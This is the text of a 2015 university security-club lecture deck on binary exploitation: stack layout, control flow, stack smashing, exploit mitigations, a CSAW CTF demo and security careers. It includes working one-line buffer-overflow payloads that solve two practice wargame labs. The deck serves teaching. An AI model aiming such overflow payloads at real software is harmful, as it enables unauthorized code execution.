Security & Exploitation Operating Systems Spring 2015 RPISEC - 05/11/2015 OS Security 1
whoami Markus Gaasedelen B.S. Computer Science 15 Security Enthusiast I like to hack things President of RPISEC http://rpis.ec RPISEC - 05/11/2015 OS Security 2
What is RPISEC? The Computer Security Club @ RPI http://rpis.ec The leading authority on campus for any and all things computer security related We compete in hacking competitions known as CTFs (Capture The Flag) and we re very good at them RPISEC - 05/11/2015 OS Security 3
CSAW 2014 Finals RPISEC - 05/11/2015 OS Security 4
CSAW 2014 Finals RPISEC - 05/11/2015 OS Security 5
CSAW 2014 Awards RPISEC - 05/11/2015 OS Security 6
What is RPISEC? The Computer Security Club @ RPI http://rpis.ec The leading authority on campus for any and all things computer security related We compete in hacking competitions known as CTFs (Capture The Flag) and we re very good at them We teach cool and applicable security skills at our weekly meetings 5-7pm Fridays, DCC 324 RPISEC - 05/11/2015 OS Security 7
Weekly Meetings RPISEC - 05/11/2015 OS Security 8
let s get rolling WHAT IS SECURITY? RPISEC - 05/11/2015 OS Security 9
RPISEC - 05/11/2015 OS Security 10
What is Security? Security == Hacking politically correct Cyber is the buzzword Very technical and rewarding challenges Rarely touched upon in academia Many different categories of security RPISEC - 05/11/2015 OS Security 11
Categories of Security Cryptography Web Security Vulnerability Research Binary Exploitation Reverse Engineering Malware Analysis Systems Security Embedded Hardware Hacking Network Security Digital Forensics Physical Security Pentesting RPISEC - 05/11/2015 OS Security 12
Categories of Security Cryptography Web Security Vulnerability Research Binary Exploitation Reverse Engineering Malware Analysis Systems Security Embedded Hardware Hacking Network Security Digital Forensics Physical Security Pentesting The kind of stuff I ll talk about today RPISEC - 05/11/2015 OS Security 13
MEMORY CORRUPTION & BINARY EXPLOITATION RPISEC - 05/11/2015 OS Security 14
Defining Binary Exploitation Binary Exploitation Carefully leveraging bugs in an application to cause extreme but controlled failure RPISEC - 05/11/2015 OS Security 15
Binary Exploitation extreme but controlled failure RPISEC - 05/11/2015 OS Security 16
Binary Exploitation extreme but controlled failure RPISEC - 05/11/2015 OS Security 17
Binary Exploitation extreme but controlled failure But what does that even mean? RPISEC - 05/11/2015 OS Security 18
Visualizing Exploitation RPISEC - 05/11/2015 OS Security 19
Visualizing Exploitation RPISEC - 05/11/2015 OS Security 20
Visualizing Exploitation RPISEC - 05/11/2015 OS Security 21
Visualizing Exploitation RPISEC - 05/11/2015 OS Security 22
Visualizing Exploitation RPISEC - 05/11/2015 OS Security 23
Visualizing Exploitation wat RPISEC - 05/11/2015 OS Security 24
Super Mario World Sillyness https://youtu.be/jnz2nnyysue?t=38 RPISEC - 05/11/2015 OS Security 25
Defining Binary Exploitation Binary Exploitation Carefully leveraging bugs in an application to cause extreme but controlled failure Exploitation requires intimate knowledge of the language, compiler, and the machine RPISEC - 05/11/2015 OS Security 26
Language Pyramid RPISEC - 05/11/2015 OS Security 27
The Unexciting Languages Binary exploitation isn t really a thing for managed or scripting languages C#,.NET, JavaScript, Lua, Python, etc RPISEC - 05/11/2015 OS Security 28
The Unexciting Languages RPISEC - 05/11/2015 OS Security 29
The Unexciting Languages Binary exploitation isn t really a thing for managed or scripting languages C#,.NET, JavaScript, Lua, Python, etc Slower, automates a lot of stuff for you Driving an automatic RPISEC - 05/11/2015 OS Security 30
The C Language C is a low level language RPISEC - 05/11/2015 OS Security 31
The C Language C is a low level language Compiles straight to machine code Very fast RPISEC - 05/11/2015 OS Security 32
The C Language RPISEC - 05/11/2015 OS Security 33
The C Language C is a low level language Compiles straight to machine code Very fast Very fine control over the machine and memory It s like driving a manual! RPISEC - 05/11/2015 OS Security 34
The C Language C is a low level language Compiles straight to machine code Very fast Very fine control over the machine and memory It s like driving a manual! Easy to do stupid things RPISEC - 05/11/2015 OS Security 35
RPISEC - 05/11/2015 OS Security 36
Going Deeper RPISEC - 05/11/2015 OS Security 37
Pulling Back the Curtain there's way too much information to decode the Matrix. You get used to it, though. Your brain does the translating. I don't even see the code. All I see is blonde, brunette, redhead. -Cypher, The Matrix RPISEC - 05/11/2015 OS Security 38
let s dive right in and try breaking some stuff WELCOME TO THE WARZONE RPISEC - 05/11/2015 OS Security 39
warzone.rpis.ec ssh username/password lab2c / RPISEC - 05/11/2015 OS Security 40
Getting Started / Tips cd /levels/lab2./lab2c AAAA python c print A *20 gdb./lab2c run In GDB: Info functions Info registers i r disassemble <function> disas main breakpoint <function> b main breakpoint * <address> b * 0x08048455 RPISEC - 05/11/2015 OS Security 41
Stack Overview The stack is a region of memory for a program to maintain function variables, arguments, and control flow metadata during execution RPISEC - 05/11/2015 OS Security 42
Understanding the Stack RPISEC - 05/11/2015 OS Security 43
Understanding the Stack RPISEC - 05/11/2015 OS Security 44
Corrupting the Stack RPISEC - 05/11/2015 OS Security 45
PWNING the Stack RPISEC - 05/11/2015 OS Security 46
Endianess Endianess How data is stored in memory Modern computers are generally little endian little end in Endianess can be confusing, and I don t want to get into the details 0x41424344 stored as 0x44, 0x43, 0x42, 0x41 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde RPISEC - 05/11/2015 OS Security 47
lab2c Exploit./lab2C $(python -c 'print "A"*15 + "\xef\xbe\xad\xde"') RPISEC - 05/11/2015 OS Security 48
Bend it like Beckham UNDERSTANDING CONTROL FLOW RPISEC - 05/11/2015 OS Security 49
Example ELF / EXE in Memory Runtime Memory 0x00000000 Start of memory Libraries (libc) ELF Executable.text segment 0x08048000 Start of.text Segment.data segment Heap Stack 0xbfff0000 Top of stack 0xFFFFFFFF End of memory RPISEC - 05/11/2015 OS Security 50
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment Executable code.data segment.text segment Heap Stack RPISEC - 05/11/2015 OS Security 51
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 52
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 53
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 54
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 55
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 56
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment Executable code.data segment.text segment EIP Heap Stack RPISEC - 05/11/2015 OS Security 57
Example ELF / EXE in Memory Runtime Memory Libraries (libc) EIP ELF Executable.text segment.data segment.text segment Heap Stack RPISEC - 05/11/2015 OS Security 58
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment.text segment EIP Heap Stack RPISEC - 05/11/2015 OS Security 59
Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment Executable code.data segment.text segment Heap EIP Stack RPISEC - 05/11/2015 OS Security 60
Example ELF / EXE in Memory Runtime Memory Libraries (libc) EIP ELF Executable.text segment.data segment.text segment Heap Stack RPISEC - 05/11/2015 OS Security 61
How Calling Works EIP RPISEC - 05/11/2015 OS Security 62
How Calling Works EIP RPISEC - 05/11/2015 OS Security 63
How Calling Works EIP RPISEC - 05/11/2015 OS Security 64
How Calling Works EIP RPISEC - 05/11/2015 OS Security 65
How Calling Works EIP RPISEC - 05/11/2015 OS Security 66
How Calling Works EIP RPISEC - 05/11/2015 OS Security 67
Returning EIP RPISEC - 05/11/2015 OS Security 68
Returning EIP RPISEC - 05/11/2015 OS Security 69
Returning EIP RPISEC - 05/11/2015 OS Security 70
Returning EIP RPISEC - 05/11/2015 OS Security 71
Returning EIP RPISEC - 05/11/2015 OS Security 72
Now that you know how it works OWNING CONTROL FLOW RPISEC - 05/11/2015 OS Security 73
Stack Smashing EIP RPISEC - 05/11/2015 OS Security 74
Stack Smashing EIP RPISEC - 05/11/2015 OS Security 75
Stack Smashing EIP RPISEC - 05/11/2015 OS Security 76
Returning EIP RPISEC - 05/11/2015 OS Security 77
Returning home EIP SEGFAULT 0x41414141 RPISEC - 05/11/2015 OS Security 78
RPISEC - 05/11/2015 OS Security 79
If your program simply segfaulted, consider yourself lucky. -Chuck Stewart RPISEC - 05/11/2015 OS Security 80
Redirecting Control Flow Overwrite with a code address EIP RPISEC - 05/11/2015 OS Security 81
warzone.rpis.ec SSH in as lab2b use the password you got from solving lab2c RPISEC - 05/11/2015 OS Security 82
RPISEC - 05/11/2015 OS Security 83
lab2b Exploit./lab2B $(python -c 'print "A"*27 + "\x7d\x84\x04\x08" + "B"*4 + "\xa0\x85\x04\x08"') RPISEC - 05/11/2015 OS Security 84
Modern Protections Data Execution Prevention (DEP) Address Space Layout Randomization (ASLR) Stack Cookies (Canaries) Read Only Relocation (RELRO) FORTIFY_SOURCE These only make things harder, not impossible RPISEC - 05/11/2015 OS Security 85
Those were more academic challenges BREAKING SOMETHING MODERN RPISEC - 05/11/2015 OS Security 86
Exploitation on Windows 8.1 (x64) CSAW 2014 LINKS.EXE RPISEC - 05/11/2015 OS Security 87
links.exe Challenge from the CSAW 2014 CTF Finals 64bit exploitation on Windows 8.1 Basically all protections are on by default No source code, lots of x64 reversing Doubly linked circular list implementation pushfront, pushback, delete, copy, print, sort RPISEC - 05/11/2015 OS Security 88
reversing is tedious RPISEC - 05/11/2015 OS Security 89
Windows 8.1 Exploitation (x64) CSAW 2014 LINKS.EXE - DEMO RPISEC - 05/11/2015 OS Security 90
CSAW 2014 Finals RPISEC - 05/11/2015 OS Security 91
Wrapping up Binary Exploitation You might consider yourself a *rockstar* programmer, but you probably know little to nothing about secure coding practices or the implications of your mistakes Compilers go out of their way to prevent your bugs from causing catastrophic failure Because your program doesn t appear to segfault or crash, doesn t mean it is bug free or without vulnerabilities Binary exploitation is nothing like standard software development - I truly think of it as an art RPISEC - 05/11/2015 OS Security 92
welcome to the real world JOB OPPORTUNITIES RPISEC - 05/11/2015 OS Security 93
so many jobs Typical titles / positions Information Security Analyst / Engineer Security Software Engineer Vulnerability Research Engineer Web Application Security Engineer Computer Network Operations Threat & Incident Response Engineer Product Security Reverse Engineer Malware Analyst / Reverse Engineer RPISEC - 05/11/2015 OS Security 94
Entering the Job Market There is a major shortage of qualified security individuals in industry Skilled in security & have a B.S. in CS? Government, Contractors, FFRDCs $70k $100k Private / Commercial $100k?? Anything less and you re missing out RPISEC - 05/11/2015 OS Security 95
One Great Adventure RPISEC - 05/11/2015 OS Security 96
SECURITY @ RPI RPISEC - 05/11/2015 OS Security 97
Security @ RPI Malware Analysis Fall 2015 Coming soon! Modern Binary Exploitation Spring 2015 http://rpis.ec/binexp/ Hardware Reverse Engineering Spring 2014 http://security.cs.rpi.edu/courses/hwre-spring2014/ Malware Analysis Spring 2013 http://security.cs.rpi.edu/courses/malware-spring2013/ Secure Software Principles Spring 2010 http://cs.rpi.edu/academics/courses/spring10/csci4971/ RPISEC - 05/11/2015 OS Security 98
Questions? gaasem [at] rpi.edu security.cs.rpi.edu/~gaasem @gaasedelen irc.rpis.ec 6667 RPISEC - 05/11/2015 OS Security 99